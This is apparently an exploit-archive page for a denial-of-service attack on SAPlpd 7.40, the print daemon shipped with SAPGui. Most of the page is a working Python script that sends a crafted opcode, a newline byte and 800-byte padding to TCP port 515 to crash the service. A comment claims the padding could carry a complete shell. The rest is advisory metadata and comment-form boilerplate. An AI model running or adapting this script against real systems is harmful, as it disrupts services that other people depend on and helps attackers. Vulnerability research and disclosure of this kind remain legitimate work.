SapLPD 7.4.0 Denial Of Service

2017.01.14

Credit: Peter Baris

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: SAPlpd 7.40 Denial of Service
# Date: 2016-12-28
# Exploit Author: Peter Baris
# Exploit code: http://saptech-erp.com.au/resources/saplpd_dos.zip
# Version: 7.40 all patch levels (as a part of SAPGui 7.40)
# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64
import socket
# Opcodes 03h and 04h are vulnerable to bad characters 00h and 0ah
# So you can modify the DoS accordingly
# The added 800 A's are just to show, that you can deliver a complete shell with the command
DoS = ("\x03"+"\x0a"+"\x41"*800)
s = socket.socket()
s.settimeout(1)
s.connect(('192.168.198.132', 515))
print("[*] Crashing SAPlpd 7.40")
print("[*] Payload length: "+str(len(DoS))+" bytes")
s.send(DoS)
s.close()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SapLPD 7.4.0 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.